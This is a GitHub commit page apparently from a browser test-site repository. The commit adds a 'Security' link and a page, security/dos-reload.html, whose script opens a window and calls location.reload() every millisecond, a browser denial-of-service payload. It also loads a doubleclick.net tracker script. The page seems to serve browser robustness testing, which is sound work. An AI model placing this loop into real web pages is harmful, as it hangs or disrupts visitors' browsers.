Skip to content

Commit

Permalink
Add dos reload site (#2)
Browse files Browse the repository at this point in the history
* Add dos reload site

* Remove duplicated link

* Clean up

* Update README.md

Rename the repo.

* Geolocation API test (+ a bit of a clean up) (#1)

* Add geolocation API test.

* Improve headers, move back button to the top.

* Add missing EOL

* Add dos reload site

* Update title of dos-reload
  • Loading branch information
marcosholgado authored Jul 24, 2020
1 parent a54f392 commit 23601f1
Show file tree
Hide file tree
Showing 2 changed files with 26 additions and 0 deletions.
5 changes: 5 additions & 0 deletions index.html
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,11 @@ <h2>Browser Features</h2>
<li><a href="./features/geolocation.html">Geolocation</a>
</ul>

<h2>Security</h2>

<ul>
<li><a href="./security/dos-reload.html">Infinite location.reload() loop</a>
</ul>

</body>
</html>
21 changes: 21 additions & 0 deletions security/dos-reload.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>Infinite location.reload() loop</title>

<script src="//doubleclick.net/tracker.js"></script>
</head>
<body>
<p><a href="../index.html">[Home]</a></p>

<p>Infinite location.reload() loop</p>

<script>
open("");
setInterval('location.reload()',1);
</script>

</body>
</html>

0 comments on commit 23601f1

Please sign in to comment.